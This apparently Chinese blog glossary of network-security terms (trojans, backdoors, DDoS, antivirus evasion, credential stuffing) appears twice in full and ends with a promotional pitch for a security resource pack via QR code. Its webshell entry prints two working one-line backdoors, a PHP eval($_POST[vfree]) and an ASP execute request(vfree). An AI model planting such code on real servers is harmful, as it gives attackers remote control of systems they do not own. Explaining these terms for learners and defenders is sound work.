木马木马是指恶意代码伪装成正常的程序当被运行时会获取到整个系统的权限比如往年的灰鸽子蜜蜂大盗等木马基本有四个特征隐蔽性欺骗性顽固性和危害性。木马种类繁多。网页木马网页木马是指恶意网页伪装成正常的页面如果受害者的系统或者浏览器存在漏洞网页木马会利用漏洞自动下载执行到受害者电脑中。后门(backdoor)后门是指攻击者在通过特定手段方式进入了系统后通过写入或者上传特定程序或者修改某些配置进系统从而获得更加长久的控制权这种方式往往比较难被发现相当于小偷进了你的房间走的时候还配了一把钥匙方便进出。网站后门(webshell)网站后门又可以称为webshell通过一段特定的代码或者在某些文件中添加代码植入到网站的服务器中使用中国菜刀或者蚁剑冰蝎等连接工具进行连接和backdoor差不多植入后门后会获取到整个系统的权限。常见的网站后门用PHP和ASPJSP写的比如常见的一句话木马。一句话木马一句话木马是指通过一段代码就可以达到控制对方服务器权限的后门文件。PHP: ?php eval($_POST[vfree]);? //vfree就是连接密码复制ASP: %execute request(vfree)% //vfree就是连接密码复制肉鸡所谓肉鸡就是那种被攻破的系统可以随意被攻击者使用而不被发现被攻破的系统可以是WindowsLinuxunix等操作系统当前最大ddos攻击基本上都是通过控制几十台甚至几百台肉鸡同时发起攻击。跳板跳板机常和肉鸡相辅相成使用一般可以用跳板机去攻击入侵别人的主机。DDOSDDOS指分布式拒绝服务攻击DDOS是网络中最为常见且最难防御的一种攻击方式通过几十台主机甚至几百台肉鸡主机同时对一个网站进行访问攻击由于请求过多严重时可以导致宕机使得网站无法为正常访问的用户提供服务。当前的防御方式基本上都是搞对抗使用一些高防大带宽或者流量清洗设备来抵御但是这种方式往往是治标不治本。内网内网就是局域网比如校园网公司内部网络等这些都属于局域网常见的内网IPA段有19217210内网网段保留IP 10.0.0.0—10.255.255.255 172.16.0.0—172.31.255.255 192.168.0.0—192.168.255.255复制外网外网就是连接internet(互联网)只有连接地了外网才能访问网站等外网ip不会使用内网的保留ip段。IP地址ip地址可以在互联网中标识每一台主机由四个点分10进制的数组成每个点中的数值范围只能取0-255比如8.8.8.8端口端口相当于数据出入地大门端口范围1-65535部分端口是保留端口有着自己对应的服务比如开启网站服务就会默认开启80端口。免杀免杀就是指通过技术手段对木马进行加壳加密修改特征码添加花指令等方式绕过杀毒软件的查杀。蜜罐蜜罐相当于模拟一个真实的环境也可以是比真实环境更易受攻击但是不会影响到正常的业务进行后台人员可以通过蜜罐捕获的内容进行分析查看真实环境中哪里易受攻击。脱库入侵了数据库后将整个数据库库下载下来这种行为成为“拖库”不是“脱裤子”嗷不过也可以亲切成为“脱裤”。撞库通过已有的数据库使用用户名密码去测试其他站点的登陆页面ROOTunix系统中的最高权限用户拥有着控制整个系统权限。权限权限大小决定当前用户对这个文件有什么操作权限是否可删可查可写。如何系统学习网络安全/黑客网络安全不是「速成黑客」而是守护数字世界的骑士修行。当你第一次用自己写的脚本检测出漏洞时那种创造的快乐远胜于电影里的炫技。装上虚拟机从配置第一个Linux环境开始脚踏实地从基础命令学起相信你一定能成为一名合格的黑客。如果你还不知道从何开始我自己整理的282G的网络安全教程可以分享我也是一路自学走过来的很清楚小白前期学习的痛楚你要是没有方向还没有好的资源根本学不到东西下面是我整理的网安资源希望能帮到你。需要的话可以V扫描下方二维码联系领取~如果二维码失效可以点击下方链接去拿一样的哦【CSDN大礼包】最新网络安全/网安技术资料包~282G无偿分享1.从0到进阶主流攻防技术视频教程包含红蓝对抗、CTF、HW等技术点2.入门必看攻防技术书籍pdf书面上的技术书籍确实太多了这些是我精选出来的还有很多不在图里3.安装包/源码主要攻防会涉及到的工具安装包和项目源码防止你看到这连基础的工具都还没有4.面试试题/经验网络安全岗位面试经验总结谁学技术不是为了赚$呢找个好的岗位很重要需要的话可以V扫描下方二维码联系领取~因篇幅有限资料较为敏感仅展示部分资料添加上方即可获取如果二维码失效可以点击下方链接去拿一样的哦【CSDN大礼包】最新网络安全/网安技术资料包~282G无偿分享
常见网络安全名词
木马木马是指恶意代码伪装成正常的程序当被运行时会获取到整个系统的权限比如往年的灰鸽子蜜蜂大盗等木马基本有四个特征隐蔽性欺骗性顽固性和危害性。木马种类繁多。网页木马网页木马是指恶意网页伪装成正常的页面如果受害者的系统或者浏览器存在漏洞网页木马会利用漏洞自动下载执行到受害者电脑中。后门(backdoor)后门是指攻击者在通过特定手段方式进入了系统后通过写入或者上传特定程序或者修改某些配置进系统从而获得更加长久的控制权这种方式往往比较难被发现相当于小偷进了你的房间走的时候还配了一把钥匙方便进出。网站后门(webshell)网站后门又可以称为webshell通过一段特定的代码或者在某些文件中添加代码植入到网站的服务器中使用中国菜刀或者蚁剑冰蝎等连接工具进行连接和backdoor差不多植入后门后会获取到整个系统的权限。常见的网站后门用PHP和ASPJSP写的比如常见的一句话木马。一句话木马一句话木马是指通过一段代码就可以达到控制对方服务器权限的后门文件。PHP: ?php eval($_POST[vfree]);? //vfree就是连接密码复制ASP: %execute request(vfree)% //vfree就是连接密码复制肉鸡所谓肉鸡就是那种被攻破的系统可以随意被攻击者使用而不被发现被攻破的系统可以是WindowsLinuxunix等操作系统当前最大ddos攻击基本上都是通过控制几十台甚至几百台肉鸡同时发起攻击。跳板跳板机常和肉鸡相辅相成使用一般可以用跳板机去攻击入侵别人的主机。DDOSDDOS指分布式拒绝服务攻击DDOS是网络中最为常见且最难防御的一种攻击方式通过几十台主机甚至几百台肉鸡主机同时对一个网站进行访问攻击由于请求过多严重时可以导致宕机使得网站无法为正常访问的用户提供服务。当前的防御方式基本上都是搞对抗使用一些高防大带宽或者流量清洗设备来抵御但是这种方式往往是治标不治本。内网内网就是局域网比如校园网公司内部网络等这些都属于局域网常见的内网IPA段有19217210内网网段保留IP 10.0.0.0—10.255.255.255 172.16.0.0—172.31.255.255 192.168.0.0—192.168.255.255复制外网外网就是连接internet(互联网)只有连接地了外网才能访问网站等外网ip不会使用内网的保留ip段。IP地址ip地址可以在互联网中标识每一台主机由四个点分10进制的数组成每个点中的数值范围只能取0-255比如8.8.8.8端口端口相当于数据出入地大门端口范围1-65535部分端口是保留端口有着自己对应的服务比如开启网站服务就会默认开启80端口。免杀免杀就是指通过技术手段对木马进行加壳加密修改特征码添加花指令等方式绕过杀毒软件的查杀。蜜罐蜜罐相当于模拟一个真实的环境也可以是比真实环境更易受攻击但是不会影响到正常的业务进行后台人员可以通过蜜罐捕获的内容进行分析查看真实环境中哪里易受攻击。脱库入侵了数据库后将整个数据库库下载下来这种行为成为“拖库”不是“脱裤子”嗷不过也可以亲切成为“脱裤”。撞库通过已有的数据库使用用户名密码去测试其他站点的登陆页面ROOTunix系统中的最高权限用户拥有着控制整个系统权限。权限权限大小决定当前用户对这个文件有什么操作权限是否可删可查可写。如何系统学习网络安全/黑客网络安全不是「速成黑客」而是守护数字世界的骑士修行。当你第一次用自己写的脚本检测出漏洞时那种创造的快乐远胜于电影里的炫技。装上虚拟机从配置第一个Linux环境开始脚踏实地从基础命令学起相信你一定能成为一名合格的黑客。如果你还不知道从何开始我自己整理的282G的网络安全教程可以分享我也是一路自学走过来的很清楚小白前期学习的痛楚你要是没有方向还没有好的资源根本学不到东西下面是我整理的网安资源希望能帮到你。需要的话可以V扫描下方二维码联系领取~如果二维码失效可以点击下方链接去拿一样的哦【CSDN大礼包】最新网络安全/网安技术资料包~282G无偿分享1.从0到进阶主流攻防技术视频教程包含红蓝对抗、CTF、HW等技术点2.入门必看攻防技术书籍pdf书面上的技术书籍确实太多了这些是我精选出来的还有很多不在图里3.安装包/源码主要攻防会涉及到的工具安装包和项目源码防止你看到这连基础的工具都还没有4.面试试题/经验网络安全岗位面试经验总结谁学技术不是为了赚$呢找个好的岗位很重要需要的话可以V扫描下方二维码联系领取~因篇幅有限资料较为敏感仅展示部分资料添加上方即可获取如果二维码失效可以点击下方链接去拿一样的哦【CSDN大礼包】最新网络安全/网安技术资料包~282G无偿分享